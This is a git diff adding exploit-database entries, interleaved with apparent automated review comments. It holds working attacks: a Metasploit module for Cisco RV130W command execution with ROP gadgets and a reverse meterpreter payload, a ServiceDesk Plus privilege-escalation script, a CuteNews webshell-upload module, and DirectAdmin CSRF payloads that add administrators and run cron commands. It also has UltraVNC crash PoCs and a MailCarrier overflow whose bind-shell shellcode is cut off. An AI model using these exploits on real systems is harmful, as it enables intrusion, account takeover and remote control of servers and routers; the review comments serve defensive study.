diff --git a/exploits/hardware/remote/46705.rb b/exploits/hardware/remote/46705.rb new file mode 100755 index 000000000..273813c18 --- /dev/null +++ b/exploits/hardware/remote/46705.rb 
@@ -0,0 +1,149 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +# linux/armle/meterpreter/bind_tcp -> segfault +# linux/armle/meterpreter/reverse_tcp -> segfault +# linux/armle/meterpreter_reverse_http -> works +# linux/armle/meterpreter_reverse_https -> works +# linux/armle/meterpreter_reverse_tcp -> works +# linux/armle/shell/bind_tcp -> segfault +# linux/armle/shell/reverse_tcp -> segfault +# linux/armle/shell_bind_tcp -> segfault +# linux/armle/shell_reverse_tcp -> segfault +# +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Cisco RV130W Routers Management Interface Remote Command Execution', + 'Description' => %q{ + A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router + could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. + + The vulnerability is due to improper validation of user-supplied data in the web-based management interface. + An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. + + A successful exploit could allow the attacker to execute arbitrary code on the underlying operating + system of the affected device as a high-privilege user. + + RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected. + + Note: successful exploitation may not result in a session, and as such, + on_new_session will never repair the HTTP server, leading to a denial-of-service condition. + }, + 'Author' => + [ + 'Yu Zhang', # Initial discovery + 'Haoliang Lu', # Initial discovery + 'T. 
Shiomitsu', # Initial discovery + 'Quentin Kaiser ' # Vulnerability analysis & exploit dev + ], + 'License' => MSF_LICENSE, + 'Platform' => %w[linux], + 'Arch' => [ARCH_ARMLE], + 'SessionTypes' => %w[meterpreter], + 'CmdStagerFlavor' => %w{ wget }, + 'Privileged' => true, # BusyBox + 'References' => + [ + ['CVE', '2019-1663'], + ['BID', '107185'], + ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'], + ], + 'DefaultOptions' => { + 'WfsDelay' => 10, + 'SSL' => true, + 'RPORT' => 443, + 'CMDSTAGER::FLAVOR' => 'wget', + 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp', + }, + 'Targets' => + [ + [ 'Cisco RV130/RV130W < 1.0.3.45', + { + 'offset' => 446, + 'libc_base_addr' => 0x357fb000, + 'system_offset' => 0x0004d144, + 'gadget1' => 0x00020e79, # pop {r2, r6, pc}; + 'gadget2' => 0x00041308, # mov r0, sp; blx r2; + 'Arch' => ARCH_ARMLE, + } + ], + ], + 'DisclosureDate' => 'Feb 27 2019', + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [ CRASH_SERVICE_DOWN, ], + }, + )) + end + + def p(offset) + [(target['libc_base_addr'] + offset).to_s(16)].pack('H*').reverse + end + + def prepare_shellcode(cmd) + #All these gadgets are from /lib/libc.so.0 + shellcode = rand_text_alpha(target['offset']) + # filler + p(target['gadget1']) + + p(target['system_offset']) + # r2 + rand_text_alpha(4) + # r6 + p(target['gadget2']) + # pc + cmd + shellcode + end + + def send_request(buffer) + begin + send_request_cgi({ + 'uri' => '/login.cgi', + 'method' => 'POST', + 'vars_post' => { + "submit_button": "login", + "submit_type": "", + "gui_action": "", + "wait_time": 0, + "change_action": "", + "enc": 1, + "user": rand_text_alpha_lower(5), + "pwd": buffer, + "sel_lang": "EN" + } + }) + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router") + end + end + + def exploit + print_status('Sending request') + execute_cmdstager + end + + def execute_command(cmd, opts = {}) + 
shellcode = prepare_shellcode(cmd.to_s) + send_request(shellcode) + end + + def on_new_session(session) + # Given there is no process continuation here, the httpd server will stop + # functioning properly and we need to take care of proper restart + # ourselves. + print_status("Reloading httpd service") + reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S" + if session.type.to_s.eql? 'meterpreter' + session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' + session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\"" + else + session.shell_command(reload_httpd_service) + end + ensure + super + end +end \ No newline at end of file diff --git a/exploits/jsp/webapps/46659.py b/exploits/jsp/webapps/46659.py new file mode 100755 index 000000000..afbc13cad --- /dev/null +++ b/exploits/jsp/webapps/46659.py 
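Review bot: The `'Notes'` hash records only `'Stability' => [ CRASH_SERVICE_DOWN, ]`, yet the module stages its payload with the `wget` CmdStager flavor and delivers the request through the router's web interface, so `'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]` and, given the header comment that most payload variants segfault, `'Reliability' => [ UNRELIABLE_SESSION ]` would describe the footprint accurately. For defenders the useful indicator is the request shape: a POST to `/login.cgi` whose `pwd` field is several hundred bytes long (the filler alone is `target['offset']`, 446 bytes, before the gadget addresses and the command), which no legitimate login produces. The httpd restart in `on_new_session` only runs when a session is actually obtained, so when the payload segfaults the description's warning about the service staying down is the operative outcome; the fixed firmware named in the description (1.0.3.45) is the remediation.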
@@ -0,0 +1,193 @@ +#!/usr/bin/python + +# Exploit Title: Manage Engine ServiceDesk Plus Version <10.0 Privilege Escalation +# Date: 30-03-2019 +# Exploit Author: Ata Hakçıl, Melih Kaan Yıldız +# Vendor: ManageEngine +# Vendor Homepage: www.manageengine.com +# Product: Service Desk Plus +# Version: 10.0 +# Tested On: Kali Linux +# CVE: CVE-2019-10008 +# Platform: JSP + +# Timeline + +# 22 march 2019: Discovery +# 24 march 2019: CVE id reserved for CVE-2019-10008 +# 26 march 2019: First contact with vendor +# 5 april 2019: First publication +# 10 april 2019: Vendor confirmation +# 11 april 2019: Vendor released a fix (version 10017) + + +# Reference link: https://www.manageengine.com/products/service-desk/readme.html + +import os +import re + + + +# How to use: Change the host, low_username, low_password and high_username variables depending on what you have. +# Low username and password is an account you have access to. high_username is account you want to authenticate as. + +# After running the script, it will output you the cookies that you can set on your browser to login to the high_username without password. 
+ + +#Host ip address + port +host="localhost:8080" + +#set to https if needed +url = "http://" + host + +#Username with credentials you have +low_username="guest" +low_password="guest" + +#username you want to login as +high_username="administrator" + +print("\033[1;37mUrl: \033[1;32m" + url) +print("\033[1;37mUser with low priv: \033[1;32m" + low_username + ':' + low_password) +print("\033[1;37mUser to bypass authentication to: \033[1;32m" + high_username) + + +print("\033[1;32mGetting a session id\033[1;37m") + +# Get index page to capture a session id +curl = "curl -i -s -k -X $'GET' \ + -H $'Host: "+host+"' -H $'Referer: "+url+"/' -H $'Connection: close'\ + $'"+url+"/'" + +out = os.popen('/bin/bash -c "' + curl+'"').read() +sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] + +print("Sessid:") +print(sessid) + + +print("\033[1;31mLogging in with low privilege user\033[1;37m") + + +#Attempt login post request +curl="curl -i -s -k -X $'POST' -H $'Host: "+host+"'\ + -H $'Referer: "+url+"/'\ + -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \ + -b $'JSESSIONID="+sessid+"' \ + --data-binary $'j_username="+low_username+"&j_password="+low_password+"&LDAPEnable=false&\ + hidden=Select+a+Domain&hidden=For+Domain&AdEnable=false&DomainCount=0&LocalAuth=No&LocalAuthWithDomain=No&\ + dynamicUserAddition_status=true&localAuthEnable=true&logonDomainName=-1&loginButton=Login&checkbox=checkbox' \ + $'"+url+"/j_security_check'" + +out = os.popen('/bin/bash -c "' + curl+'"').read() + + +#Instead of following redirects with -L, following manually because we don't need all the transactions. 
+curl="curl -i -s -k -X $'GET' -H $'Host: "+host+"'\ + -H $'Referer: "+url+"/'\ + -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \ + -b $'JSESSIONID="+sessid+"' \ + $'"+url+"/'" + +out = os.popen('/bin/bash -c "' + curl+'"').read() + +print("\033[1;32mCaptured authenticated cookies.\033[1;37m") +sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] +print(sessid) +sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0] +print(sessidsso) +grbl = re.findall("(?<=Set-Cookie: )[^=]*=[^;]*",out) + +grbl2 = [] +for cookie in grbl: + cl = cookie.split('=') + if cl[0]!='JSESSIONID' and cl[0]!='JSESSIONIDSSO' and cl[0]!='_rem': + + grbl2.append(cl[0]) + grbl2.append(cl[1]) + +curl = "curl -i -s -k -X $'GET' \ + -H $'Host: "+host+"' \ + -H $'Cookie: JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + -b $'JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + $'"+url+"/mc/'" + + +out = os.popen('/bin/bash -c "' + curl+'"').read() +sessid2 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] + +print("\033[1;32mCaptured secondary sessid.\033[1;37m") +print(sessid2) + + +print("\033[1;31mDoing the magic step 1.\033[1;37m") +curl = "curl -i -s -k -X $'GET' \ + -H $'Host: "+host+"' \ + -H $'Referer: "+url+"/mc/WOListView.do' \ + -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + $'"+url+"/mc/jsp/MCLogOut.jsp'" + +out = os.popen('/bin/bash -c "' + curl+'"').read() + +print("\033[1;31mDoing the magic step 2.\033[1;37m") + + + + +curl = "curl -i -s -k -X $'GET' \ + -H $'Host: "+host+"' \ + -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; 
JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + $'"+url+"/mc/jsp/MCDashboard.jsp'" + + +out = os.popen('/bin/bash -c "' + curl+'"').read() + +sessid3 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] +sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0] + + +curl = "curl -i -s -k -X $'GET' \ + -H $'Host: "+host+"' \ + -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + $'"+url+"/'" + +out = os.popen('/bin/bash -c "' + curl+'"').read() +sessid4 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] + + +curl = "curl -i -s -k -X $'POST' \ + -H $'"+host+"' \ + -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \ + -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + --data-binary $'j_username="+high_username+"&j_password=bypassingpass&DOMAIN_NAME=' \ + $'"+url+"/mc/j_security_check'" + + +out = os.popen('/bin/bash -c "' + curl+'"').read() + +curl = "curl -i -s -k -X $'GET' \ + -H $'Host: "+host+"' \ + -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \ + -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + -H $'Upgrade-Insecure-Requests: 1' \ + -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + $'"+url+"/mc/jsp/MCDashboard.jsp'" + + + +out = os.popen('/bin/bash -c "' + 
curl+'"').read() + + +sessidhigh = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] +sessidssohigh = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0] + +print("\033[1;31mCaptured target session.Set following cookies on your browser.\033[1;37m") +print("JSESSIONID=" + sessidhigh) +print("JSESSIONIDSSO=" + sessidssohigh) +print(grbl2[0] + "=" + grbl2[1]) +print(grbl2[2] + "=" + grbl2[3]) +print("_rem=true") \ No newline at end of file diff --git a/exploits/php/remote/46698.rb b/exploits/php/remote/46698.rb new file mode 100755 index 000000000..2471ac3ec --- /dev/null +++ b/exploits/php/remote/46698.rb 
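Review bot: Values taken from the server's `Set-Cookie` headers (`sessid`, `sessidsso`, the `grbl2[...]` pairs) are spliced into a shell command string and executed with `os.popen('/bin/bash -c "' + curl + '"')`, so a hostile or already-compromised ServiceDesk host returning a cookie value that contains `"` or `$(` could run commands on the machine this script is executed from; building the requests with `http.client`/`urllib` or passing an argument list to `subprocess.run(..., shell=False)` removes that exposure. Each `re.findall(...)[0]` raises a bare `IndexError` when the expected cookie is absent (for instance when the low-privilege login is rejected), which leaves the operator with no indication of what failed. The version statements are inconsistent — the title says `Version <10.0`, the `# Version:` line says `10.0`, and the timeline says the vendor fix is build `10017` — so the affected range should be stated once in the build-number form the vendor uses.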
@@ -0,0 +1,181 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => "CuteNews 2.1.2 - 'avatar' Remote Code Execution", + 'Description' => %q( + This module exploits a command execution vulnerability in CuteNews prior to 2.1.2. + The attacker can infiltrate the server through the avatar upload process in the profile area. + There is no realistic control of the $imgsize function in "/core/modules/dashboard.php" + Header content of the file can be changed and the control can be bypassed. + We can use the "GIF" header for this process. + An ordinary user is enough to exploit the vulnerability. No need for admin user. + The module creates a file for you and allows RCE. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module + ], + 'References' => + [ + ['URL', 'http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html'] + ['URL', 'http://cutephp.com'] # Official Website + ], + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['Automatic', {}]], + 'Privileged' => false, + 'DisclosureDate' => "Apr 14 2019", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, "Base CutePHP directory path", '/CuteNews']), + OptString.new('USERNAME', [true, "Username to authenticate with", 'admin']), + OptString.new('PASSWORD', [false, "Password to authenticate with", 'admin']) + ] + ) + end + + def exec + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "uploads","avatar_#{datastore['USERNAME']}_#{@shell}") # shell url + }) + end +## +# Login and cookie information gathering +## + + def login(uname, pass, check) + # 1st request to get cookie + 
res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'index.php'), + 'vars_post' => { + 'action' => 'dologin', + 'username' => uname, + 'password' => pass + } + ) + + cookie = res.get_cookies + # 2nd request to cookie validation + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "index.php"), + 'cookie' => cookie + }) + + if res.code = 200 && (res.body =~ /dashboard/) + return cookie + end + + fail_with(Failure::NoAccess, "Authentication was unsuccessful with user: #{uname}") + return nil + end + + def peer + "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" + end +## +# Upload malicious file // payload integration +## + def upload_shell(cookie, check) + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "index.php?mod=main&opt=personal"), + 'cookie' => cookie + }) + + signkey = res.body.split('__signature_key" value="')[1].split('"')[0] + signdsi = res.body.split('__signature_dsi" value="')[1].split('"')[0] + # data preparation + fname = Rex::Text.rand_text_alpha_lower(8) + ".php" + @shell = "#{fname}" + pdata = Rex::MIME::Message.new + pdata.add_part('main', nil, nil, 'form-data; name="mod"') + pdata.add_part('personal', nil, nil, 'form-data; name="opt"') + pdata.add_part("#{signkey}", nil, nil, 'form-data; name="__signature_key"') + pdata.add_part("#{signdsi}", nil, nil, 'form-data; name="__signature_dsi"') + pdata.add_part('', nil, nil, 'form-data; name="editpassword"') + pdata.add_part('', nil, nil, 'form-data; name="confirmpassword"') + pdata.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="editnickname"') + pdata.add_part("GIF\r\n" + payload.encoded, 'image/png', nil, "form-data; name=\"avatar_file\"; filename=\"#{fname}\"") + pdata.add_part('', nil, nil, 'form-data; name="more[site]"') + pdata.add_part('', nil, nil, 'form-data; name="more[about]"') + data = pdata.to_s + + res = send_request_cgi({ + 'method' => 'POST', + 'data' 
=> data, + 'agent' => 'Mozilla', + 'ctype' => "multipart/form-data; boundary=#{pdata.bound}", + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri.path, "index.php") + }) + + if res && res.code == 200 && res.body =~ /User info updated!/ + print_status("Trying to upload #{fname}") + return true + else + fail_with(Failure::NoAccess, 'Error occurred during uploading!') + return false + end + + end +## +# Exploit controls and information +## + def exploit + unless Exploit::CheckCode::Vulnerable == check + fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') + end + + cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false) + print_good("Authentication was successful with user: #{datastore['USERNAME']}") + + if upload_shell(cookie, true) + print_good("Upload successfully.") + exec + end + end +## +# Version and Vulnerability Check +## + def check + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "index.php") + }) + + unless res + vprint_error 'Connection failed' + return CheckCode::Unknown + end + + if res.code == 200 + version = res.body.split('target="_blank">CuteNews ')[1].split('')[0] + if version < '2.1.3' + print_status("#{peer} - CuteNews is #{version}") + return Exploit::CheckCode::Vulnerable + end + end + + return Exploit::CheckCode::Safe + end +end +## +# The end of the adventure (o_O) // AkkuS +## \ No newline at end of file diff --git a/exploits/php/webapps/46694.txt b/exploits/php/webapps/46694.txt new file mode 100644 index 000000000..1beebdb07 --- /dev/null +++ b/exploits/php/webapps/46694.txt 
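Review bot: The affected-version statements disagree: `'Name'` says 2.1.2, the description says "prior to 2.1.2", and `check` treats any version string `< '2.1.3'` as vulnerable — and that is a lexicographic `String#<`, so a hypothetical `'2.10.0'` would also sort below `'2.1.3'`; `Rex::Version.new(version) < Rex::Version.new('2.1.3')` compares versions properly, and one affected range should be stated everywhere. The `split('')[0]` in `check` looks like an HTML tag lost during extraction, so the version parsing may be damaged on this page rather than in the original module. The module writes `avatar_<USERNAME>_<random>.php` into `uploads/` and never removes it, yet `'Notes'` carries no `'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]` to record that; a PHP file under `uploads/` named `avatar_*` whose content begins with `GIF` is the on-disk indicator a defender should look for. `def exec` shadows `Kernel#exec` and discards the `res` it assigns; a name such as `trigger_payload` would be clearer.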
@@ -0,0 +1,69 @@
+# Title: DirectAdmin Multiple Vulnerabilities to Takeover the Server <= v1.561
+# Date: 12.04.2019
+# Author: InfinitumIT
+# Vendor Homepage: https://www.directadmin.com/
+# Version: Up to v1.561.
+# CVE: CVE-2019-11193
+# info@infinitumit.com.tr && infinitumit.com.tr
+
+# Description:
+# Multiple security vulnerabilities has been discovered in popular server control panel DirectAdmin, by
+# InfinitumIT. Attackers can combine those security vulnerabilities and do a lot of critical action like server control takeover.
+# Those vulnerabilities (Cross Site Scripting and Cross Site Request Forgery) may cause them to happen:
+# Add administrator, execute command remote (RCE), Full Backup the Server and Upload the Own Server, webshell upload and more.
+
+# Reflected XSS Vulnerabilities:
+# https://SERVERIP:2222/CMD_FILE_MANAGER/XSS-PAYLOAD
+# https://SERVERIP:2222/CMD_SHOW_USER?user=XSS-PAYLOAD
+# https://SERVERIP:2222/CMD_SHOW_RESELLER?user=XSS-PAYLOAD
+
+# Example Payloads:
+# Add Administrator:
+var url = "http://SERVERIP:2222/CMD_ACCOUNT_ADMIN";
+var params =
+"fakeusernameremembered=&fakepasswordremembered=&action=create&username=username&emai
+l=test%40test.com&passwd=password&passwd2=password¬ify=ye";
+var vuln = new XMLHttpRequest();
+vuln.open("POST", url, true);
+vuln.withCredentials = 'true';
+vuln.setRequestHeader("Content-type",
+"application/x-www-form-urlencoded");
+vuln.send(params);
+
+# Remote Command Execution by Cron Jobs:
+var url = "http://SERVERIP:2222/CMD_CRON_JOBS";
+var params =
+"action=create&minute=*&hour=*&dayofmonth=*&month=*&dayofweek=*&command=command";
+var vuln = new XMLHttpRequest();
+vuln.open("POST", url, true);
+vuln.withCredentials = 'true';
+vuln.setRequestHeader("Content-type",
+"application/x-www-form-urlencoded");
+vuln.send(params);
+
+# Edit File:
+var url = "http://SERVERIP:2222/CMD_ADMIN_FILE_EDITOR";
+var params = "file=the-file-full-path&action=save&text=new-content";
+var vuln = new XMLHttpRequest();
+vuln.open("POST", url, true);
+vuln.withCredentials = 'true';
+vuln.setRequestHeader("Content-type",
+"application/x-www-form-urlencoded");
+vuln.send(params);
+
+# Create FTP Account:
+var url = "http://SERVERIP:2222/CMD_FTP";
+var params =
+"fakeusernameremembered=&fakepasswordremembered=&action=create&domain=infinitumit.com.tr
+&user=username&passwd=password&random=Save+Password&passwd2=password&type=domain&cu
+stom_val=%2Fhome%2Fusername&create=Create";
+var vuln = new XMLHttpRequest();
+vuln.open("POST", url, true);
+vuln.withCredentials = 'true';
+vuln.setRequestHeader("Content-type",
+"application/x-www-form-urlencoded");
+vuln.send(params);
+
+
+# Vulnerabilities are fixed in minutes, thanks to DirectAdmin.
+# InfinitumIT / For safer days...
\ No newline at end of file
diff --git a/exploits/windows/dos/46702.py b/exploits/windows/dos/46702.py
new file mode 100755
index 000000000..e417e3d9b
--- /dev/null
+++ b/exploits/windows/dos/46702.py
@@ -0,0 +1,21 @@
+#Exploit Title: UltraVNC Viewer 1.2.2.4 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-04-14
+#Vendor Homepage: https://www.uvnc.com/
+#Software Link: https://www.uvnc.com/downloads/ultravnc/126-download-ultravnc-1224.html
+#Tested Version: 1.2.2.4
+#Tested on: Windows 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: UltraVNC_Viewer_1.2.2.4.py
+#2.- Open UltraViewer.txt and copy content to clipboard
+#3.- Open UltraVNC Viewer
+#4.- In "VNC Server" Paste Clipboard
+#5.- Click on "Connect"
+#6.- Crashed
+
+cod = "\x41" * 256
+
+f = open('UltraViewer.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46703.py b/exploits/windows/dos/46703.py
new file mode 100755
index 000000000..a63ec6e36
--- /dev/null
+++ b/exploits/windows/dos/46703.py
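Review bot: The advisory names the last affected release (`<= v1.561`) but not the release that carries the fix, even though the closing line states the vulnerabilities were fixed; adding the fixed version would let administrators verify remediation instead of inferring it from the date. The first payload's query string contains `&passwd2=password¬ify=ye`, which looks like HTML entity-decoding damage to the original text (an `&` followed by letters collapsed into `¬`), so the listing should be checked against the original advisory before being relied on. The endpoints listed — the three reflected-XSS paths and the CSRF targets `CMD_ACCOUNT_ADMIN`, `CMD_CRON_JOBS`, `CMD_ADMIN_FILE_EDITOR` and `CMD_FTP` — are the request paths worth auditing in panel access logs for POSTs whose `Referer`/`Origin` is not the panel itself.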
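Review bot: The output file is handled as `f = open('UltraViewer.txt', 'w')` / `f.write(cod)` / `f.close()`, which leaks the handle if `write` raises; `with open('UltraViewer.txt', 'w') as f: f.write(cod)` closes it on every path. The same pattern appears in `46703.py` in the next hunk. The header records `Tested Version` and `Tested on` but no CVE and no vendor contact or response, so the disclosure status of this crash appears undocumented.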
@@ -0,0 +1,22 @@
+#Exploit Title: UltraVNC Launcher 1.2.2.4 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-04-14
+#Vendor Homepage: https://www.uvnc.com/
+#Software Link: https://www.uvnc.com/downloads/ultravnc/126-download-ultravnc-1224.html
+#Tested Version: 1.2.2.4
+#Tested on: Windows 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: UltraVNC_Launcher_1.2.2.4.py
+#2.- Open UltraLauncher.txt and copy content to clipboard
+#3.- Open UltraVNC Launcher
+#4.- Select "Properties"
+#5.- In "Path vncviewer.exe" Paste Clipboard
+#6.- Click on "OK"
+#7.- Crashed
+
+cod = "\x41" * 300
+
+f = open('UltraLauncher.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/remote/46695.py b/exploits/windows/remote/46695.py
new file mode 100755
index 000000000..746bf286b
--- /dev/null
+++ b/exploits/windows/remote/46695.py
@@ -0,0 +1,84 @@ +#!/usr/bin/python +# Exploit Title: MailCarrier 2.51 'RCPT TO' - Buffer Overflow (Remote) +# Date: 12/04/2019 +# Exploit Author: Dino Covotsos - Telspace Systems +# Vendor Homepage: https://www.tabslab.com/ +# Version: 2.51 +# Software Link: N.A +# Contact: services[@]telspace.co.za +# Twitter: @telspacesystems (Greets to the Telspace Crew) +# Tested on: Windows XP Prof SP3 ENG x86 +# CVE: TBC from Mitre +# Created for the Telspace Internship 2019 - Vanilla EIP Overwrite +#0x7e4456f7 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll) +#POC +#1.) Change ip and port in code +#2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine +import sys +import socket +import time + +#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c +shellcode = ("\x89\xe0\xda\xdf\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" +"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +"\x79\x6c\x6a\x48\x4d\x52\x57\x70\x45\x50\x65\x50\x55\x30\x6e" +"\x69\x6a\x45\x55\x61\x39\x50\x32\x44\x4e\x6b\x76\x30\x44\x70" +"\x4e\x6b\x42\x72\x76\x6c\x6c\x4b\x51\x42\x47\x64\x6e\x6b\x44" +"\x32\x44\x68\x56\x6f\x4c\x77\x43\x7a\x57\x56\x34\x71\x6b\x4f" +"\x6c\x6c\x37\x4c\x73\x51\x61\x6c\x75\x52\x74\x6c\x35\x70\x49" +"\x51\x68\x4f\x76\x6d\x56\x61\x6a\x67\x4a\x42\x7a\x52\x62\x72" +"\x53\x67\x4c\x4b\x72\x72\x54\x50\x4c\x4b\x63\x7a\x75\x6c\x4e" +"\x6b\x70\x4c\x72\x31\x73\x48\x4b\x53\x31\x58\x63\x31\x68\x51" +"\x43\x61\x6e\x6b\x72\x79\x77\x50\x46\x61\x5a\x73\x6e\x6b\x32" +"\x69\x64\x58\x6d\x33\x35\x6a\x32\x69\x4e\x6b\x67\x44\x4c\x4b" +"\x75\x51\x39\x46\x30\x31\x69\x6f\x4c\x6c\x4f\x31\x6a\x6f\x64" 
